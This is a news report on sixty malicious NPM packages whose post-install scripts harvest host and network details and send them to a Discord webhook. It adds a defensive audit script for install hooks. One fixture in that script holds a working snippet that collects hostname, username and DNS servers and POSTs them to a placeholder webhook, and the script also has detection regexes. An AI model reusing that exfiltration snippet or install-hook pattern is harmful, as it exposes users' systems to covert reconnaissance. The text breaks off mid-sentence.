Dozens of malicious packages on NPM collect host and network data
Published on: 2025-06-24 04:37:41
Sixty packages have been discovered in the NPM index that attempt to collect sensitive host and network data and send it to a Discord webhook controlled by the threat actor.
According to Socket’s Threat Research team, the packages were uploaded to the NPM repository starting May 12 from three publisher accounts.
Each of the malicious packages contains a post-install script that automatically executes during ‘npm install’ and collects the following information:
- Hostname
- Internal IP address
- User home directory
- Current working directory
- Username
- System DNS servers
The script also checks for hostnames associated with cloud providers and for reverse DNS strings, in an attempt to determine whether it is running in an analysis environment.
Socket did not observe the delivery of second-stage payloads, privilege escalation, or any persistent mechanisms. However, given the type of data collected, the danger of targeted network attacks is significant.
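Because the behaviour described above hinges on an npm lifecycle hook, a defender can audit installed manifests for such hooks and flag the indicators the article names (host and DNS enumeration, a Discord webhook as the exfiltration channel). The following is an added example, not code from the article or from Socket; the package names, the setup.js body and the webhook placeholder are constructed fixtures, and the indicator regexes are heuristics of this example.

```javascript
// Added example (not from the article or Socket): audit package.json manifests
// for install-time lifecycle hooks and score their scripts against indicators
// drawn from the article. Constructed fixtures stand in for node_modules files.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"]; // prepare also runs on some install paths

// Heuristic indicators (this example's own, labelled as such):
const SUSPICIOUS = [
  { name: "discord-webhook", re: /discord(?:app)?\.com\/api\/webhooks/i },
  { name: "host-enumeration", re: /os\.(?:hostname|userInfo|networkInterfaces|homedir)\(/ },
  { name: "dns-servers", re: /dns\.getServers\(/ },
];

// Audit one manifest object; scriptBodies maps a referenced file name to its text.
function auditManifest(manifest, scriptBodies = {}) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (!(hook in scripts)) continue;
    const cmd = scripts[hook];
    // Resolve e.g. "node setup.js" to its file body when the caller supplied it.
    const file = Object.keys(scriptBodies).find((f) => cmd.includes(f));
    const body = cmd + "\n" + (file ? scriptBodies[file] : "");
    const indicators = SUSPICIOUS.filter((s) => s.re.test(body)).map((s) => s.name);
    findings.push({ package: manifest.name, hook, command: cmd, indicators });
  }
  return findings; // empty array means no install hook at all
}

// Constructed fixtures: a package with only a test script, and one shaped like
// the article's description (postinstall hook, host/DNS lookups, webhook URL).
const benign = { name: "example-benign-pkg", scripts: { test: "node test.js" } };
const suspect = { name: "example-suspect-pkg", scripts: { postinstall: "node setup.js" } };
const suspectBodies = {
  "setup.js":
    "const os=require('os');const dns=require('dns');" +
    "const d={h:os.hostname(),u:os.userInfo().username,dns:dns.getServers()};" +
    "fetch('https://discord.com/api/webhooks/PLACEHOLDER',{method:'POST',body:JSON.stringify(d)});",
};

// Run the audit over both fixtures and return only manifests with install hooks.
function runAudit() {
  return [...auditManifest(benign), ...auditManifest(suspect, suspectBodies)];
}

console.log(JSON.stringify(runAudit(), null, 2));
```

In a real tree the caller would walk node_modules, read each package.json and any file its hook references, and feed them to auditManifest; installing with `npm install --ignore-scripts` prevents the hook from running while the audit is performed.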
Packages still available on NPM
The researchers reported t